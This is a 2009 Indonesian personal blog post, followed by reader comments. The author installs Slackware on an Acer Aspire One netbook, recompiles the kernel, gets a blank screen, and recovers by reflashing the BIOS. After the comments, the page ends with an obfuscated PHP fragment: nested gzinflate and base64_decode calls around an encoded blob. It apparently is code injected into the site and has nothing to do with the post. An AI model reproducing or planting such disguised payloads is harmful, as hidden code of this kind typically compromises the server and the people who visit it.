Delicious

Archives

Categories

Aspire One gw Blank Screen!!!

  ozzie / 18/02/2009


Semenjak kehadiran laptop baru hasil berjelajah di KasKus ;)).. jadi doyan ngoprek-ngoprek lagi:">.. sebelumnya sempet di temenin oleh beberapa laptop terdahulu yang kesemuanya hancur akibat oprek-mengoprek :)) (Today pakek AspireOne :D )..

Sengaja milih yang kecil biar lebih simple dan gampang nemenin kemana-mana sekalian setting CDI ama jetting bareng koleksi spuyer 8-}.. di bengkel, di kantor, di DataCenter, maintenance outdoor pun gak ribet:D.. apalagi bisa nonton pelem dimana-mana yak say 8-}8-}..

dengan semangat ngoprek akhirnya install slackware 12.2 :D.. biarpun gak punya CD-ROM:-s tapi dengan modal ikut-ikutan forum aspire one akhirnya dapet referensi buat install linux via USB <:-p<:-p

selesai install semua fungsi berjalan dengan mulus [-o<[-o<.. webcam, wireless, touchpad, vga, sound, ethernet, dan indikator battery. belon puas dengan kernel bawaan slackware 12.2 (2.6.27) akhirnya compile ulang kernel dengan tujuan customization selera gw :)):))..

dipilihlah kernel 2.6.28.5-ozz :D.. build kernel sampe selesai trus booting:-ss:-ss.. alhamdulillah semua running dengan baik [-o<… karena ada beberapa fitur kernel yang kurang pas {verbose kernel time, framebuffer, hotkey function} akhirnya re-compile lagih #:-s.. compile selesai diteruskan dengan reboot.. ternyata :-ss:-ss:-ss:-ss… blank :((:((:((… cabut-colok battery gak ngaruh.. :((.. cari-cari selah buat clear bios tapi… :-s.. akhirnya googling.. dan ternyata. banyak yang ngalemin fenomena ntuh ;)).. bios gak fungsi gara-gara kepanasan:-<.. solusinya dengan upgrade firmwire dengan flash biosnya ;));))..

Alhamdulillah kembali normal [-o<[-o<


« »


5 Responses to “Aspire One gw Blank Screen!!!”

  1. a13 Says:

    ‘kebanyakan’ kali…;)) 8-}

  2. KieN Says:

    woi kamfret ….!!
    kunyuk gw kok masih lom aktif sich …
    ga niat ngasih space nih ….huhuhu >.

  3. ozzie Says:

    bah!!.. udah aktip.. dns nya udah di arahin belom??

  4. dedyeuy Says:

    Sama gw juga gitu ozz aspire one gw pas asik lagi maen tokek ijo eh pas gw matiin trus gw mau nyalain lagi mokat, ga ada responnya boro2 masuk bios untung masih garansi gw balikin aja ke acer dan kembali normal deh…itu karena apa ya ozz? kecangihan kernel kali ya

  5. singgihs Says:

    Numpang link ya Mas … http://blog.singgihsaptadi.asia/2009/03/blank-black-screen-dan-power-lamp-on-aspire-one-kepanasan/

    Tengkyu :)


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>